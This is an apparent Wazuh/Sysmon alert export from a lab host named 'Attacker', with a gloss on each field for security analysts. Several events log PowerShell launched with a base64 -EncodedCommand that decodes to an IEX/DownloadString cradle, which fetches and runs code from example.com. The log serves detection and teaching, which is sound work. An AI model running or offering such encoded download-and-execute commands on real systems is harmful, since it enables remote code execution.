decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:08.8267106Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351174 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:57:07.554
ProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00}
ProcessId: 16876
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00}
ParentProcessId: 13988
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:07.554 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c3-680a-140d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 145 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535431.2985635 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:09.0424583Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351175 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:08.997
ProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00}
ProcessId: 16876
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_0oi5rz3g.woj.ps1
CreationUtcTime: 2025-04-24 22:57:08.995
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:08.997 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c3-680a-140d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0oi5rz3g.woj.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:08.995 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 142 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535433.2988404 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:11.4950021Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351211 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:57:10.231
ProcessGuid: {94294ddc-c1c6-680a-160d-000000000e00}
ProcessId: 8744
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00}
ParentProcessId: 16876
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:10.231 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c6-680a-160d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8744 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 146 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535433.2996471 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:11.7142281Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351212 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:11.664
ProcessGuid: {94294ddc-c1c6-680a-160d-000000000e00}
ProcessId: 8744
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5j1irpdl.sgx.ps1
CreationUtcTime: 2025-04-24 22:57:11.664
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:11.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c6-680a-160d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8744 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5j1irpdl.sgx.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:11.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).